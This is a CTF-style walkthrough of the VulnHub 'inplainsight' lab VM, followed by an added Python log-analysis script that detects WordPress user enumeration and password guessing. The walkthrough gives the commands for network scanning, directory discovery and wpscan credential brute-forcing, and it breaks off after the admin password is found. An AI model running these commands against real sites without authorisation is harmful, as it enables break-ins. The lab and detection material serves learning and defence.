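Today's exercise is the inplainsight image from VulnHub, download link: https://download.vulnhub.com/inplainsight/inplainsight1.ova. It imported into VirtualBox successfully.

Scan for the target's address with sudo netdiscover -r 192.168.0.0/24, which gives the target address 192.168.0.176. Continue with a port scan, sudo nmap -sS -sV -T5 -A -p- 192.168.0.176, which shows that the target runs an HTTP service on port 80.

Browsing to http://192.168.0.176 gives a hint pointing to the index.htnl page. Browse to http://192.168.0.176/index.htnl, click the image, click Upload Image, and view the page source. Convert the encoded string to plaintext, echo c28tZGV2LXdvcmRwcmVzcw== | base64 -d, which gives the path so-dev-wordpress.

Scan that path, dirb http://192.168.0.176/so-dev-wordpress, which confirms it is WordPress. Enumerate the users, wpscan --url http://192.168.0.176/so-dev-wordpress --enumerate u, which gives mike and admin. Brute-force the passwords, wpscan --url http://192.168.0.176/so-dev-wordpress -U mike,admin -P /usr/share/wordlists/dirb/common.txt, which gives the username/password admin/admin1,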
………………………………
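
Seen from the defender's side, the user enumeration and password guessing above leave a recognizable trail in the web server's access log. The following is an added example, not part of the original post: the log lines, client IPs and threshold are constructed, and it assumes enumeration shows up as author-ID or REST users requests and that WordPress answers a failed wp-login.php POST with 200 and a successful one with 302 (its default behavior).

```python
import re
from collections import defaultdict

# Apache/nginx "combined"-style prefix: ip, ident, user, [time], "METHOD path proto", status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Assumed enumeration indicators: author-ID probing and the REST users endpoint.
ENUM_RE = re.compile(r'[?&]author=\d+|/wp-json/wp/v2/users')
LOGIN_RE = re.compile(r'/wp-login\.php(\?|$)')


def analyze(lines, fail_threshold=5):
    """Return {ip: {"enum": n, "failed": n, "success_after_failures": bool}}."""
    stats = defaultdict(lambda: {"enum": 0, "failed": 0, "success_after_failures": False})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        s = stats[m["ip"]]
        if m["method"] == "GET" and ENUM_RE.search(m["path"]):
            s["enum"] += 1
        elif m["method"] == "POST" and LOGIN_RE.search(m["path"]):
            if m["status"] == "200":  # login form re-rendered: failed attempt
                s["failed"] += 1
            elif m["status"] == "302" and s["failed"] >= fail_threshold:
                # a redirect after many failures: a guess probably succeeded
                s["success_after_failures"] = True
    return dict(stats)


def sample_log():
    """Constructed sample lines (not taken from the page)."""
    ts = "[01/Jan/2024:10:00:00 +0000]"
    base = "/so-dev-wordpress"
    scanner, user = "192.168.0.50", "192.168.0.77"  # constructed client IPs
    lines = [f'{scanner} - - {ts} "GET {base}/?author={i} HTTP/1.1" 301 0' for i in (1, 2, 3)]
    lines += [f'{scanner} - - {ts} "POST {base}/wp-login.php HTTP/1.1" 200 4096'] * 6
    lines.append(f'{scanner} - - {ts} "POST {base}/wp-login.php HTTP/1.1" 302 0')
    lines.append(f'{user} - - {ts} "POST {base}/wp-login.php HTTP/1.1" 302 0')  # normal login
    return lines


if __name__ == "__main__":
    for ip, s in analyze(sample_log()).items():
        print(ip, s)
```

An address flagged with success_after_failures is the case to escalate first: it means a weak password such as the one found here was guessed, not merely tried.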